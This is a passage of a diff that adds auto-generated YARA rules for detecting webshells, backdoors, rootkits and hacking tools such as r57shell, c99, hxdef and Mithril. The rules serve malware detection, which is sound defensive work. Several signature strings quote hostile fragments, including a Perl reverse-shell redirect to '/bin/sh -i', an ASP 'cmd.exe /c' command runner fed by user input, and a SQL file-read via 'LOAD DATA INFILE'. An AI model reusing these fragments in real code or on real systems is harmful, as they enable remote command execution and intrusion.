+		$s4 = "      echo \"<hr size=1 noshade>\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n\\n<"
+	condition:
+		all of them
+}
+rule saphpshell {
+	meta:
+		description = "Webshells Auto-generated - file saphpshell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "d7bba8def713512ddda14baf9cd6889a"
+	strings:
+		$s0 = "<td><input type=\"text\" name=\"command\" size=\"60\" value=\"<?=$_POST['command']?>"
+	condition:
+		all of them
+}
+rule HYTop2006_rar_Folder_2006Z {
+	meta:
+		description = "Webshells Auto-generated - file 2006Z.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "fd1b6129abd4ab177fed135e3b665488"
+	strings:
+		$s1 = "wangyong,czy,allen,lcx,Marcos,kEvin1986,myth"
+		$s8 = "System\\CurrentControlSet\\Control\\Keyboard Layouts\\%.8x"
+	condition:
+		all of them
+}
+rule admin_ad {
+	meta:
+		description = "Webshells Auto-generated - file admin-ad.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "e6819b8f8ff2f1073f7d46a0b192f43b"
+	strings:
+		$s6 = "<td align=\"center\"> <input name=\"cmd\" type=\"text\" id=\"cmd\" siz"
+		$s7 = "Response.write\"<a href='\"&url&\"?path=\"&Request(\"oldpath\")&\"&attrib=\"&attrib&\"'><"
+	condition:
+		all of them
+}
+rule FSO_s_casus15 {
+	meta:
+		description = "Webshells Auto-generated - file casus15.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "8d155b4239d922367af5d0a1b89533a3"
+	strings:
+		$s6 = "if((is_dir(\"$deldir/$file\")) AND ($file!=\".\") AND ($file!=\"..\"))"
+	condition:
+		all of them
+}
+rule BIN_Client {
+	meta:
+		description = "Webshells Auto-generated - file Client.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "9f0a74ec81bc2f26f16c5c172b80eca7"
+	strings:
+		$s0 = "=====Remote Shell Closed====="
+		$s2 = "All Files(*.*)|*.*||"
+		$s6 = "WSAStartup Error!"
+		$s7 = "SHGetFileInfoA"
+		$s8 = "CreateThread False!"
+		$s9 = "Port Number Error"
+	condition:
+		4 of them
+}
+rule shelltools_g0t_root_uptime {
+	meta:
+		description = "Webshells Auto-generated - file uptime.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "d1f56102bc5d3e2e37ab3ffa392073b9"
+	strings:
+		$s0 = "JDiamondCSlC~"
+		$s1 = "CharactQA"
+		$s2 = "$Info: This file is packed with the UPX executable packer $"
+		$s5 = "HandlereateConso"
+		$s7 = "ION\\System\\FloatingPo"
+	condition:
+		all of them
+}
+rule Simple_PHP_BackDooR {
+	meta:
+		description = "Webshells Auto-generated - file Simple_PHP_BackDooR.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "a401132363eecc3a1040774bec9cb24f"
+	strings:
+		$s0 = "<hr>to browse go to http://<? echo $SERVER_NAME.$REQUEST_URI; ?>?d=[directory he"
+		$s6 = "if(!move_uploaded_file($HTTP_POST_FILES['file_name']['tmp_name'], $dir.$fn"
+		$s9 = "// a simple php backdoor"
+	condition:
+		1 of them
+}
+rule sig_2005Gray {
+	meta:
+		description = "Webshells Auto-generated - file 2005Gray.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "75dbe3d3b70a5678225d3e2d78b604cc"
+	strings:
+		$s0 = "SCROLLBAR-FACE-COLOR: #e8e7e7;"
+		$s4 = "echo \"&nbsp;<a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace"
+		$s8 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)"
+		$s9 = "SCROLLBAR-3DLIGHT-COLOR: #cccccc;"
+	condition:
+		all of them
+}
+rule DllInjection {
+	meta:
+		description = "Webshells Auto-generated - file DllInjection.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "a7b92283a5102886ab8aee2bc5c8d718"
+	strings:
+		$s0 = "\\BDoor\\DllInjecti"
+	condition:
+		all of them
+}
+rule Mithril_v1_45_Mithril {
+	meta:
+		description = "Webshells Auto-generated - file Mithril.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "f1484f882dc381dde6eaa0b80ef64a07"
+	strings:
+		$s2 = "cress.exe"
+		$s7 = "\\Debug\\Mithril."
+	condition:
+		all of them
+}
+rule hkshell_hkrmv {
+	meta:
+		description = "Webshells Auto-generated - file hkrmv.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "bd3a0b7a6b5536f8d96f50956560e9bf"
+	strings:
+		$s5 = "/THUMBPOSITION7"
+		$s6 = "\\EvilBlade\\"
+	condition:
+		all of them
+}
+rule phpshell {
+	meta:
+		description = "Webshells Auto-generated - file phpshell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "1dccb1ea9f24ffbd085571c88585517b"
+	strings:
+		$s1 = "echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b"
+		$s2 = "$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$REMOTE_IMAGE_UR"
+		$s3 = "$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", "
+	condition:
+		all of them
+}
+rule FSO_s_cmd {
+	meta:
+		description = "Webshells Auto-generated - file cmd.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "cbe8e365d41dd3cd8e462ca434cf385f"
+	strings:
+		$s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>"
+		$s1 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)"
+	condition:
+		all of them
+}
+rule FeliksPack3___PHP_Shells_phpft {
+	meta:
+		description = "Webshells Auto-generated - file phpft.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "60ef80175fcc6a879ca57c54226646b1"
+	strings:
+		$s6 = "PHP Files Thief"
+		$s11 = "http://www.4ngel.net"
+	condition:
+		all of them
+}
+rule FSO_s_indexer {
+	meta:
+		description = "Webshells Auto-generated - file indexer.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "135fc50f85228691b401848caef3be9e"
+	strings:
+		$s3 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r"
+	condition:
+		all of them
+}
+rule r57shell {
+	meta:
+		description = "Webshells Auto-generated - file r57shell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "8023394542cddf8aee5dec6072ed02b5"
+	strings:
+		$s11 = " $_POST['cmd']=\"echo \\\"Now script try connect to"
+	condition:
+		all of them
+}
+rule bdcli100 {
+	meta:
+		description = "Webshells Auto-generated - file bdcli100.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b12163ac53789fb4f62e4f17a8c2e028"
+	strings:
+		$s5 = "unable to connect to "
+		$s8 = "backdoor is corrupted on "
+	condition:
+		all of them
+}
+rule HYTop_DevPack_2005Red {
+	meta:
+		description = "Webshells Auto-generated - file 2005Red.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "d8ccda2214b3f6eabd4502a050eb8fe8"
+	strings:
+		$s0 = "scrollbar-darkshadow-color:#FF9DBB;"
+		$s3 = "echo \"&nbsp;<a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace"
+		$s9 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)"
+	condition:
+		all of them
+}
+rule HYTop2006_rar_Folder_2006X2 {
+	meta:
+		description = "Webshells Auto-generated - file 2006X2.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "cc5bf9fc56d404ebbc492855393d7620"
+	strings:
+		$s2 = "Powered By "
+		$s3 = " \" onClick=\"this.form.sharp.name=this.form.password.value;this.form.action=this."
+	condition:
+		all of them
+}
+rule rdrbs084 {
+	meta:
+		description = "Webshells Auto-generated - file rdrbs084.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "ed30327b255816bdd7590bf891aa0020"
+	strings:
+		$s0 = "Create mapped port. You have to specify domain when using HTTP type."
+		$s8 = "<LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET"
+	condition:
+		all of them
+}
+rule HYTop_CaseSwitch_2005 {
+	meta:
+		description = "Webshells Auto-generated - file 2005.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "8bf667ee9e21366bc0bd3491cb614f41"
+	strings:
+		$s1 = "MSComDlg.CommonDialog"
+		$s2 = "CommonDialog1"
+		$s3 = "__vbaExceptHandler"
+		$s4 = "EVENT_SINK_Release"
+		$s5 = "EVENT_SINK_AddRef"
+		$s6 = "By Marcos"
+		$s7 = "EVENT_SINK_QueryInterface"
+		$s8 = "MethCallEngine"
+	condition:
+		all of them
+}
+rule eBayId_index3 {
+	meta:
+		description = "Webshells Auto-generated - file index3.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "0412b1e37f41ea0d002e4ed11608905f"
+	strings:
+		$s8 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"You"
+	condition:
+		all of them
+}
+rule FSO_s_phvayv {
+	meta:
+		description = "Webshells Auto-generated - file phvayv.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "205ecda66c443083403efb1e5c7f7878"
+	strings:
+		$s2 = "wrap=\"OFF\">XXXX</textarea></font><font face"
+	condition:
+		all of them
+}
+rule byshell063_ntboot {
+	meta:
+		description = "Webshells Auto-generated - file ntboot.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "99b5f49db6d6d9a9faeffb29fd8e6d8c"
+	strings:
+		$s0 = "SYSTEM\\CurrentControlSet\\Services\\NtBoot"
+		$s1 = "Failure ... Access is Denied !"
+		$s2 = "Dumping Description to Registry..."
+		$s3 = "Opening Service .... Failure !"
+	condition:
+		all of them
+}
+rule FSO_s_casus15_2 {
+	meta:
+		description = "Webshells Auto-generated - file casus15.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "8d155b4239d922367af5d0a1b89533a3"
+	strings:
+		$s0 = "copy ( $dosya_gonder"
+	condition:
+		all of them
+}
+rule installer {
+	meta:
+		description = "Webshells Auto-generated - file installer.cmd"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "a507919ae701cf7e42fa441d3ad95f8f"
+	strings:
+		$s0 = "Restore Old Vanquish"
+		$s4 = "ReInstall Vanquish"
+	condition:
+		all of them
+}
+rule uploader {
+	meta:
+		description = "Webshells Auto-generated - file uploader.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b9a9aab319964351b46bd5fc9d6246a8"
+	strings:
+		$s0 = "move_uploaded_file($userfile, \"entrika.php\"); "
+	condition:
+		all of them
+}
+rule FSO_s_remview_2 {
+	meta:
+		description = "Webshells Auto-generated - file remview.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b4a09911a5b23e00b55abe546ded691c"
+	strings:
+		$s0 = "<xmp>$out</"
+		$s1 = ".mm(\"Eval PHP code\")."
+	condition:
+		all of them
+}
+rule FeliksPack3___PHP_Shells_r57 {
+	meta:
+		description = "Webshells Auto-generated - file r57.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "903908b77a266b855262cdbce81c3f72"
+	strings:
+		$s1 = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']."
+	condition:
+		all of them
+}
+rule HYTop2006_rar_Folder_2006X {
+	meta:
+		description = "Webshells Auto-generated - file 2006X.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "cf3ee0d869dd36e775dfcaa788db8e4b"
+	strings:
+		$s1 = "<input name=\"password\" type=\"password\" id=\"password\""
+		$s6 = "name=\"theAction\" type=\"text\" id=\"theAction\""
+	condition:
+		all of them
+}
+rule FSO_s_phvayv_2 {
+	meta:
+		description = "Webshells Auto-generated - file phvayv.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "205ecda66c443083403efb1e5c7f7878"
+	strings:
+		$s2 = "rows=\"24\" cols=\"122\" wrap=\"OFF\">XXXX</textarea></font><font"
+	condition:
+		all of them
+}
+rule elmaliseker {
+	meta:
+		description = "Webshells Auto-generated - file elmaliseker.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "ccf48af0c8c09bbd038e610a49c9862e"
+	strings:
+		$s0 = "javascript:Command('Download'"
+		$s5 = "zombie_array=array("
+	condition:
+		all of them
+}
+rule shelltools_g0t_root_resolve {
+	meta:
+		description = "Webshells Auto-generated - file resolve.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "69bf9aa296238610a0e05f99b5540297"
+	strings:
+		$s0 = "3^n6B(Ed3"
+		$s1 = "^uldn'Vt(x"
+		$s2 = "\\= uPKfp"
+		$s3 = "'r.axV<ad"
+		$s4 = "p,modoi$=sr("
+		$s5 = "DiamondC8S t"
+		$s6 = "`lQ9fX<ZvJW"
+	condition:
+		all of them
+}
+rule FSO_s_RemExp {
+	meta:
+		description = "Webshells Auto-generated - file RemExp.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b69670ecdbb40012c73686cd22696eeb"
+	strings:
+		$s1 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Request.Ser"
+		$s5 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f=<%=F"
+		$s6 = "<td bgcolor=\"<%=BgColor%>\" align=\"right\"><%=Attributes(SubFolder.Attributes)%></"
+	condition:
+		all of them
+}
+rule FSO_s_tool {
+	meta:
+		description = "Webshells Auto-generated - file tool.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "3a1e1e889fdd974a130a6a767b42655b"
+	strings:
+		$s7 = "\"\"%windir%\\\\calc.exe\"\")"
+	condition:
+		all of them
+}
+rule FeliksPack3___PHP_Shells_2005 {
+	meta:
+		description = "Webshells Auto-generated - file 2005.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "97f2552c2fafc0b2eb467ee29cc803c8"
+	strings:
+		$s0 = "window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp"
+		$s3 = "<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">"
+	condition:
+		all of them
+}
+rule byloader {
+	meta:
+		description = "Webshells Auto-generated - file byloader.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "0f0d6dc26055653f5844ded906ce52df"
+	strings:
+		$s0 = "SYSTEM\\CurrentControlSet\\Services\\NtfsChk"
+		$s1 = "Failure ... Access is Denied !"
+		$s2 = "NTFS Disk Driver Checking Service"
+		$s3 = "Dumping Description to Registry..."
+		$s4 = "Opening Service .... Failure !"
+	condition:
+		all of them
+}
+rule shelltools_g0t_root_Fport {
+	meta:
+		description = "Webshells Auto-generated - file Fport.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "dbb75488aa2fa22ba6950aead1ef30d5"
+	strings:
+		$s4 = "Copyright 2000 by Foundstone, Inc."
+		$s5 = "You must have administrator privileges to run fport - exiting..."
+	condition:
+		all of them
+}
+rule BackDooR__fr_ {
+	meta:
+		description = "Webshells Auto-generated - file BackDooR (fr).php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "a79cac2cf86e073a832aaf29a664f4be"
+	strings:
+		$s3 = "print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">Exploit include "
+	condition:
+		all of them
+}
+rule FSO_s_ntdaddy {
+	meta:
+		description = "Webshells Auto-generated - file ntdaddy.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "f6262f3ad9f73b8d3e7d9ea5ec07a357"
+	strings:
+		$s1 = "<input type=\"text\" name=\".CMD\" size=\"45\" value=\"<%= szCMD %>\"> <input type=\"s"
+	condition:
+		all of them
+}
+rule nstview_nstview {
+	meta:
+		description = "Webshells Auto-generated - file nstview.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "3871888a0c1ac4270104918231029a56"
+	strings:
+		$s4 = "open STDIN,\\\"<&X\\\";open STDOUT,\\\">&X\\\";open STDERR,\\\">&X\\\";exec(\\\"/bin/sh -i\\\");"
+	condition:
+		all of them
+}
+rule HYTop_DevPack_upload {
+	meta:
+		description = "Webshells Auto-generated - file upload.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b09852bda534627949f0259828c967de"
+	strings:
+		$s0 = "<!-- PageUpload Below -->"
+	condition:
+		all of them
+}
+rule PasswordReminder {
+	meta:
+		description = "Webshells Auto-generated - file PasswordReminder.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "ea49d754dc609e8bfa4c0f95d14ef9bf"
+	strings:
+		$s3 = "The encoded password is found at 0x%8.8lx and has a length of %d."
+	condition:
+		all of them
+}
+rule Pack_InjectT {
+	meta:
+		description = "Webshells Auto-generated - file InjectT.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "983b74ccd57f6195a0584cdfb27d55e8"
+	strings:
+		$s3 = "ail To Open Registry"
+		$s4 = "32fDssignim"
+		$s5 = "vide Internet S"
+		$s6 = "d]Software\\M"
+		$s7 = "TInject.Dll"
+	condition:
+		all of them
+}
+rule FSO_s_RemExp_2 {
+	meta:
+		description = "Webshells Auto-generated - file RemExp.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b69670ecdbb40012c73686cd22696eeb"
+	strings:
+		$s2 = " Then Response.Write \""
+		$s3 = "<a href= \"<%=Request.ServerVariables(\"script_name\")%>"
+	condition:
+		all of them
+}
+rule FSO_s_c99 {
+	meta:
+		description = "Webshells Auto-generated - file c99.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "5f9ba02eb081bba2b2434c603af454d0"
+	strings:
+		$s2 = "\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htacce"
+	condition:
+		all of them
+}
+rule rknt_zip_Folder_RkNT {
+	meta:
+		description = "Webshells Auto-generated - file RkNT.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "5f97386dfde148942b7584aeb6512b85"
+	strings:
+		$s0 = "PathStripPathA"
+		$s1 = "`cLGet!Addr%"
+		$s2 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $"
+		$s3 = "oQToOemBuff* <="
+		$s4 = "ionCdunAsw[Us'"
+		$s6 = "CreateProcessW: %S"
+		$s7 = "ImageDirectoryEntryToData"
+	condition:
+		all of them
+}
+rule dbgntboot {
+	meta:
+		description = "Webshells Auto-generated - file dbgntboot.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "4d87543d4d7f73c1529c9f8066b475ab"
+	strings:
+		$s2 = "now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by sp"
+		$s3 = "sth junk the M$ Wind0wZ retur"
+	condition:
+		all of them
+}
+rule PHP_shell {
+	meta:
+		description = "Webshells Auto-generated - file shell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "45e8a00567f8a34ab1cccc86b4bc74b9"
+	strings:
+		$s0 = "AR8iROET6mMnrqTpC6W1Kp/DsTgxNby9H1xhiswfwgoAtED0y6wEXTihoAtICkIX6L1+vTUYWuWz"
+		$s11 = "1HLp1qnlCyl5gko8rDlWHqf8/JoPKvGwEm9Q4nVKvEh0b0PKle3zeFiJNyjxOiVepMSpflJkPv5s"
+	condition:
+		all of them
+}
+rule hxdef100 {
+	meta:
+		description = "Webshells Auto-generated - file hxdef100.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "55cc1769cef44910bd91b7b73dee1f6c"
+	strings:
+		$s0 = "RtlAnsiStringToUnicodeString"
+		$s8 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\"
+		$s9 = "\\\\.\\mailslot\\hxdef-rk100sABCDEFGH"
+	condition:
+		all of them
+}
+rule rdrbs100 {
+	meta:
+		description = "Webshells Auto-generated - file rdrbs100.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "7c752bcd6da796d80a6830c61a632bff"
+	strings:
+		$s3 = "Server address must be IP in A.B.C.D format."
+		$s4 = " mapped ports in the list. Currently "
+	condition:
+		all of them
+}
+rule Mithril_Mithril {
+	meta:
+		description = "Webshells Auto-generated - file Mithril.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "017191562d72ab0ca551eb89256650bd"
+	strings:
+		$s0 = "OpenProcess error!"
+		$s1 = "WriteProcessMemory error!"
+		$s4 = "GetProcAddress error!"
+		$s5 = "HHt`HHt\\"
+		$s6 = "Cmaudi0"
+		$s7 = "CreateRemoteThread error!"
+		$s8 = "Kernel32"
+		$s9 = "VirtualAllocEx error!"
+	condition:
+		all of them
+}
+rule hxdef100_2 {
+	meta:
+		description = "Webshells Auto-generated - file hxdef100.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "1b393e2e13b9c57fb501b7cd7ad96b25"
+	strings:
+		$s0 = "\\\\.\\mailslot\\hxdef-rkc000"
+		$s2 = "Shared Components\\On Access Scanner\\BehaviourBlo"
+		$s6 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\"
+	condition:
+		all of them
+}
+rule Release_dllTest {
+	meta:
+		description = "Webshells Auto-generated - file dllTest.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "76a59fc3242a2819307bb9d593bef2e0"
+	strings:
+		$s0 = ";;;Y;`;d;h;l;p;t;x;|;"
+		$s1 = "0 0&00060K0R0X0f0l0q0w0"
+		$s2 = ": :$:(:,:0:4:8:D:`=d="
+		$s3 = "4@5P5T5\\5T7\\7d7l7t7|7"
+		$s4 = "1,121>1C1K1Q1X1^1e1k1s1y1"
+		$s5 = "9 9$9(9,9P9X9\\9`9d9h9l9p9t9x9|9"
+		$s6 = "0)0O0\\0a0o0\"1E1P1q1"
+		$s7 = "<.<I<d<h<l<p<t<x<|<"
+		$s8 = "3&31383>3F3Q3X3`3f3w3|3"
+		$s9 = "8@;D;H;L;P;T;X;\\;a;9=W=z="
+	condition:
+		all of them
+}
+rule webadmin {
+	meta:
+		description = "Webshells Auto-generated - file webadmin.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "3a90de401b30e5b590362ba2dde30937"
+	strings:
+		$s0 = "<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpu"
+	condition:
+		all of them
+}
+rule commands {
+	meta:
+		description = "Webshells Auto-generated - file commands.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "174486fe844cb388e2ae3494ac2d1ec2"
+	strings:
+		$s1 = "If CheckRecord(\"SELECT COUNT(ID) FROM VictimDetail WHERE VictimID = \" & VictimID"
+		$s2 = "proxyArr = Array (\"HTTP_X_FORWARDED_FOR\",\"HTTP_VIA\",\"HTTP_CACHE_CONTROL\",\"HTTP_F"
+	condition:
+		all of them
+}
+rule hkdoordll {
+	meta:
+		description = "Webshells Auto-generated - file hkdoordll.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "b715c009d47686c0e62d0981efce2552"
+	strings:
+		$s6 = "Can't uninstall,maybe the backdoor is not installed or,the Password you INPUT is"
+	condition:
+		all of them
+}
+rule r57shell_2 {
+	meta:
+		description = "Webshells Auto-generated - file r57shell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "8023394542cddf8aee5dec6072ed02b5"
+	strings:
+		$s2 = "echo \"<br>\".ws(2).\"HDD Free : <b>\".view_size($free).\"</b> HDD Total : <b>\".view_"
+	condition:
+		all of them
+}
+rule Mithril_v1_45_dllTest {
+	meta:
+		description = "Webshells Auto-generated - file dllTest.dll"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "1b9e518aaa62b15079ff6edb412b21e9"
+	strings:
+		$s3 = "syspath"
+		$s4 = "\\Mithril"
+		$s5 = "--list the services in the computer"
+	condition:
+		all of them
+}
+rule dbgiis6cli {
+	meta:
+		description = "Webshells Auto-generated - file dbgiis6cli.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "3044dceb632b636563f66fee3aaaf8f3"
+	strings:
+		$s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
+		$s5 = "###command:(NO more than 100 bytes!)"
+	condition:
+		all of them
+}
+rule remview_2003_04_22 {
+	meta:
+		description = "Webshells Auto-generated - file remview_2003_04_22.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "17d3e4e39fbca857344a7650f7ea55e3"
+	strings:
+		$s1 = "\"<b>\".mm(\"Eval PHP code\").\"</b> (\".mm(\"don't type\").\" \\\"&lt;?\\\""
+	condition:
+		all of them
+}
+rule FSO_s_test {
+	meta:
+		description = "Webshells Auto-generated - file test.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "82cf7b48da8286e644f575b039a99c26"
+	strings:
+		$s0 = "$yazi = \"test\" . \"\\r\\n\";"
+		$s2 = "fwrite ($fp, \"$yazi\");"
+	condition:
+		all of them
+}
+rule Debug_cress {
+	meta:
+		description = "Webshells Auto-generated - file cress.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "36a416186fe010574c9be68002a7286a"
+	strings:
+		$s0 = "\\Mithril "
+		$s4 = "Mithril.exe"
+	condition:
+		all of them
+}
+rule webshell {
+	meta:
+		description = "Webshells Auto-generated - file webshell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "f2f8c02921f29368234bfb4d4622ad19"
+	strings:
+		$s0 = "RhViRYOzz"
+		$s1 = "d\\O!jWW"
+		$s2 = "bc!jWW"
+		$s3 = "0W[&{l"
+		$s4 = "[INhQ@\\"
+	condition:
+		all of them
+}
+rule FSO_s_EFSO_2 {
+	meta:
+		description = "Webshells Auto-generated - file EFSO_2.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "a341270f9ebd01320a7490c12cb2e64c"
+	strings:
+		$s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV"
+		$s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j"
+	condition:
+		all of them
+}
+rule thelast_index3 {
+	meta:
+		description = "Webshells Auto-generated - file index3.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "cceff6dc247aaa25512bad22120a14b4"
+	strings:
+		$s5 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"Your Name\\\" field is r"
+	condition:
+		all of them
+}
+rule adjustcr {
+	meta:
+		description = "Webshells Auto-generated - file adjustcr.exe"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "17037fa684ef4c90a25ec5674dac2eb6"
+	strings:
+		$s0 = "$Info: This file is packed with the UPX executable packer $"
+		$s2 = "$License: NRV for UPX is distributed under special license $"
+		$s6 = "AdjustCR Carr"
+		$s7 = "ION\\System\\FloatingPo"
+	condition:
+		all of them
+}
+rule FeliksPack3___PHP_Shells_xIShell {
+	meta:
+		description = "Webshells Auto-generated - file xIShell.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "997c8437c0621b4b753a546a53a88674"
+	strings:
+		$s3 = "if (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='Java"
+	condition:
+		all of them
+}
+rule HYTop_AppPack_2005 {
+	meta:
+		description = "Webshells Auto-generated - file 2005.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "63d9fd24fa4d22a41fc5522fc7050f9f"
+	strings:
+		$s6 = "\" onclick=\"this.form.sqlStr.value='e:\\hytop.mdb"
+	condition:
+		all of them
+}
+rule xssshell {
+	meta:
+		description = "Webshells Auto-generated - file xssshell.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "8fc0ffc5e5fbe85f7706ffc45b3f79b4"
+	strings:
+		$s1 = "if( !getRequest(COMMANDS_URL + \"?v=\" + VICTIM + \"&r=\" + generateID(), \"pushComma"
+	condition:
+		all of them
+}
+rule FeliksPack3___PHP_Shells_usr {
+	meta:
+		description = "Webshells Auto-generated - file usr.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "ade3357520325af50c9098dc8a21a024"
+	strings:
+		$s0 = "<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor"
+	condition:
+		all of them
+}
+rule FSO_s_phpinj {
+	meta:
+		description = "Webshells Auto-generated - file phpinj.php"
+		author = "Yara Bulk Rule Generator by Florian Roth"
+		hash = "dd39d17e9baca0363cc1c3664e608929"
+	strings:
+		$s4 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';"
+	condition:
+		all of them
+}
+rule xssshell_db {
+	meta:
+		description = "Webshells Auto-generated - file db.asp"
+		author = "Yara Bulk Rule Generator by Florian Roth"
